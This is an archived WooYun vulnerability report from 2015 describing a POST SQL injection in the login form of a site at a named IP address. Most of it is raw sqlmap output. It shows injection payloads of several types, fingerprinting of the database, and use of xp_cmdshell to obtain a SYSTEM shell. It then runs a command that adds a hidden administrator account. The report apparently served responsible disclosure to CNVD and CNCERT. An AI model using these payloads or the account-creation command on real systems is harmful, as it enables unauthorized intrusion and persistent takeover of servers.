乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-21: 细节已通知厂商并且等待厂商处理中 2015-07-24: 厂商已经确认,细节仅向厂商公开 2015-08-03: 细节向核心白帽子及相关领域专家公开 2015-08-13: 细节向普通白帽子公开 2015-08-23: 细节向实习白帽子公开 2015-09-07: 细节向公众公开
RT
post注入http://219.144.186.149/login.aspx
Parameter: logName (POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=dDwtMTMxMzA2ODI5ODs7PtR5hoqStO3R9pZPxCh7FhZY3BRU&logName=admin' AND 1488=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113)+(SELECT (CASE WHEN (1488=1488) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113))) AND 'RENn'='RENn&psw=admin&Button1=%E7%99%BB%E9%99%86 Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: __VIEWSTATE=dDwtMTMxMzA2ODI5ODs7PtR5hoqStO3R9pZPxCh7FhZY3BRU&logName=admin';WAITFOR DELAY '0:0:5'--&psw=admin&Button1=%E7%99%BB%E9%99%86 Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: __VIEWSTATE=dDwtMTMxMzA2ODI5ODs7PtR5hoqStO3R9pZPxCh7FhZY3BRU&logName=admin' WAITFOR DELAY '0:0:5'--&psw=admin&Button1=%E7%99%BB%E9%99%86 Type: UNION query Title: Generic UNION query (NULL) - 8 columns Payload: __VIEWSTATE=dDwtMTMxMzA2ODI5ODs7PtR5hoqStO3R9pZPxCh7FhZY3BRU&logName=admin' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(122)+CHAR(120)+CHAR(113)+CHAR(65)+CHAR(89)+CHAR(122)+CHAR(104)+CHAR(120)+CHAR(120)+CHAR(102)+CHAR(109)+CHAR(97)+CHAR(105)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &psw=admin&Button1=%E7%99%BB%E9%99%86---[15:30:09] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 1.1.4322back-end DBMS: Microsoft SQL Server 2000[15:30:09] [WARNING] reflective value(s) found and filtering out[15:30:09] [INFO] fingerprinting the back-end DBMS operating system version and service pack[15:30:10] [INFO] the back-end DBMS operating system is Windows 2003 Service Pack 0[15:30:10] [INFO] testing if current user is DBA[15:30:10] [INFO] checking if xp_cmdshell extended procedure is available, please wait..[15:30:20] [WARNING] time-based standard deviation method used on a model with less than 30 response timesdo you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y[15:30:24] [INFO] xp_cmdshell extended procedure is available[15:30:24] [INFO] testing if xp_cmdshell extended procedure is usable[15:30:25] [INFO] the SQL query used returns 1 entries[15:30:25] [INFO] xp_cmdshell extended procedure is usable[15:30:25] [INFO] going to use xp_cmdshell extended procedure for operating system command execution[15:30:25] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTERos-shell> whoamido you want to retrieve the command standard output? [Y/n/a] y[15:30:32] [INFO] the SQL query used returns 1 entriescommand standard output: 'nt authority\system'os-shell> net user test wooyun /add & net localgroup administrators test /adddo you want to retrieve the command standard output? [Y/n/a] y[15:32:39] [INFO] the SQL query used returns 2 entriescommand standard output: '命令成功完成。'
过滤
危害等级:中
漏洞Rank:10
确认时间:2015-07-24 15:51
CNVD确认所述情况,转由CNCERT向中国电信集团公司通报,由其后续协调网站管理单位处置.
暂无